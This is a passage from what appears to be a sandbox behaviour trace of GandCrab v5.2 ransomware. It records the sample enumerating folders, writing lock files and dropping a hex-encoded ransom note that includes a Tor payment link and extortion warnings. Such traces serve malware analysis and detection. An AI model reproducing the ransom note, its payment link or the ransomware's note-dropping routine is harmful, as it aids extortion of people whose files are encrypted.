\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0097.008] WriteFile (in: hFile=0x2ac, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259f274, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259f274*=0x2162, lpOverlapped=0x0) returned 1 [0097.008] CloseHandle (hObject=0x2ac) returned 1 [0097.008] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.009] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0097.009] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x2a, wMilliseconds=0x13c)) [0097.009] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0097.009] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0097.009] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0097.009] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Public\\Documents\\My Pictures\\d2ca4a09d2ca4deb61a.lock") returned 62 [0097.009] CreateFileW (lpFileName="C:\\Users\\Public\\Documents\\My Pictures\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\public\\documents\\my pictures\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2ac [0097.010] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.010] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.010] lstrlenW (lpString="C:\\Users\\Public\\Documents\\My Pictures\\") returned 38 [0097.010] lstrcatW (in: lpString1="C:\\Users\\Public\\Documents\\My Pictures\\", lpString2="*" | out: lpString1="C:\\Users\\Public\\Documents\\My Pictures\\*") returned="C:\\Users\\Public\\Documents\\My Pictures\\*" [0097.010] FindFirstFileExW (in: lpFileName="C:\\Users\\Public\\Documents\\My Pictures\\*", fInfoLevelId=0x1, lpFindFileData=0x259f290, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259f290) returned 0xffffffff [0097.011] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents\\My Pictures\\*", lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 0xffffffff [0097.011] CloseHandle (hObject=0x2ac) returned 1 [0097.011] FindNextFileW (in: hFindFile=0x503238, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0097.011] lstrcmpW (lpString1="My Videos", lpString2=".") returned 1 [0097.011] lstrcmpW (lpString1="My Videos", lpString2="..") returned 1 [0097.011] lstrcatW (in: lpString1="C:\\Users\\Public\\Documents\\", lpString2="My Videos" | out: lpString1="C:\\Users\\Public\\Documents\\My Videos") returned="C:\\Users\\Public\\Documents\\My Videos" [0097.011] lstrcatW (in: lpString1="C:\\Users\\Public\\Documents\\My Videos", lpString2="\\" | out: lpString1="C:\\Users\\Public\\Documents\\My Videos\\") returned="C:\\Users\\Public\\Documents\\My Videos\\" [0097.011] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0097.011] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0097.011] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0097.011] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0097.012] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0097.012] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0097.012] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0097.012] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0097.012] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0097.012] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.012] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0097.012] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\Public\\Documents\\My Videos\\\\TITWMVJL-DECRYPT.txt") returned 57 [0097.012] CreateFileW (lpFileName="C:\\Users\\Public\\Documents\\My Videos\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\public\\documents\\my videos\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0097.013] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x